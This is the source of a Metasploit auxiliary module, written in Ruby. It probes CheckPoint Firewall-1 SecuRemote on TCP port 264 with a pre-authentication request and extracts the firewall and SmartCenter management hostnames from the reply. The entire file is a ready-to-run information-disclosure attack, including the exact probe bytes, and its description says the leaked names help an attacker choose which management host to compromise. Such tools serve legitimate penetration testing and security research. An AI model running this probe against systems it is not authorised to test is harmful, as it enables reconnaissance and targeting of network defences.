metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
      'Description'    => %q{
        This module sends a query to the port 264/TCP on CheckPoint Firewall-1
        firewalls to obtain the firewall name and management station
        (such as SmartCenter) name via a pre-authentication request. The string
        returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
        host. Whilst considered "public" information, the majority of installations
        use detailed hostnames which may aid an attacker in focusing on compromising
        the SmartCenter host, or useful for government, intelligence and military
        networks where the hostname reveals the physical location and rack number
        of the device, which may be unintentionally published to the world.
      },
      'Author'         => [ 'patrick' ],
      'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference
      'References'     =>
        [
          # patrickw - None? Stumbled across, probably an old bug/feature but unsure.
          [ 'URL', 'http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(264),
      ], self.class)
  end

  def autofilter
    false
  end

  def run
    print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
    fw_hostname = nil
    sc_hostname = nil

    connect

    sock.put("\x51\x00\x00\x00")
    sock.put("\x00\x00\x00\x21")
    res = sock.get_once(4)
    if (res and res == "Y\x00\x00\x00")
      print_good("Appears to be a CheckPoint Firewall...")
      sock.put("\x00\x00\x00\x0bsecuremote\x00")
      res = sock.get_once
      if (res and res =~ /CN=(.+),O=(.+)\./i)
        fw_hostname = $1
        sc_hostname = $2
        print_good("Firewall Host: #{fw_hostname}")
        print_good("SmartCenter Host: #{sc_hostname}")
      end
    else
      print_error("Unexpected response: '#{res.inspect}'")
    end

    report_info(fw_hostname,sc_hostname)

    disconnect
  end

  # Only trust that it's real if we have a hostname. If you get a funny
  # response, it might not be what we think it is.
  def report_info(fw_hostname,sc_hostname)
    return unless fw_hostname
    host_info = {
      :host => datastore['RHOST'],
      :os_name => "Checkpoint Firewall-1",
      :purpose => "firewall"
    }
    host_info[:name] = fw_hostname
    host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
    report_host(host_info)
    svc_info = {
      :host => datastore['RHOST'],
      :port => datastore['RPORT'],
      :proto => "tcp",
      :name => "securemote"
    }
    report_service(svc_info)
  end

end